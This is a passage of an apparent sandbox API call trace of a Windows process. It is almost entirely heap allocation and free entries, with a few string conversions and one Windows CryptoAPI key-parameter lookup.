0x43e2860 [0120.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0120.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0120.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0120.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0120.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0120.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0120.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ec8 [0120.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0120.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0120.919] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0120.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0120.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0120.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0120.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0120.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0120.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0120.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0120.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0120.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0120.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0120.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0120.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0120.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0120.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0120.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0120.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0120.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0120.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0120.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0120.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0120.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0120.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0120.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0120.920] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0120.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0120.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0120.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0120.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0120.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0120.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0120.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0120.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0120.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0120.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0120.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0120.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43921f0 [0120.921] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43921f0 | out: hHeap=0x1780000) returned 1 [0120.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0120.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9b8 [0120.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0120.921] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0121.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0121.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0121.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0121.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0121.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0121.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0121.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0121.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0121.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0121.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0121.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0121.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0121.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0121.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0121.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0121.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0121.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0121.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0121.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0121.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0121.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0121.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0121.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0121.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0121.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0121.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0121.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0121.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0121.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0121.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0121.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0121.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0121.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0121.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0121.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0121.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0121.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0121.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f48 [0121.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0121.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0121.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0121.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0121.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0121.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0121.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0121.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0121.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0121.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0121.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0121.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0121.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0121.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0121.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0121.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0121.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0121.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0121.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0121.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0121.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0121.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0121.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0121.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0121.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0121.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0121.012] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0121.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0121.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0121.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0121.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0121.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0121.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0121.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0121.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0121.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0121.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0121.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0121.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0121.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0121.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0121.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0121.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0121.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0121.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0121.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0121.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0121.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0121.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0121.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0121.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0121.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0121.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796d68, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0121.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0121.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0121.013] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0121.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0121.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0121.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0121.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0121.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0121.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0121.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0121.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0121.014] CryptGetKeyParam (in: hKey=0x41ac100, dwParam=0x7, pbData=0x43e2840, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2840*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0121.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0121.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0121.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0121.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0121.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0121.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0121.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0121.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0121.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0121.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0121.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0121.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0121.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0121.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0121.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0121.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0121.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0121.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0121.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0121.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0121.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0121.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0121.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0121.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0121.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0121.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0121.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0121.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0121.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0121.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0121.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0121.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0121.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0121.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0121.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0121.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0121.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0121.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0121.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0121.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0121.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0121.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0121.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0121.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0121.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0121.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0121.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0121.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0121.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0121.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0121.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0121.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0121.015] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0121.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0121.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0121.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0121.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0121.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0121.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0121.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea268 | out: hHeap=0x1780000) returned 1 [0121.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0121.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0121.016] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0121.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0121.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0121.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0121.016] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0121.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0121.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0121.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0121.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0121.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0121.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0121.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0121.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0121.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0121.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 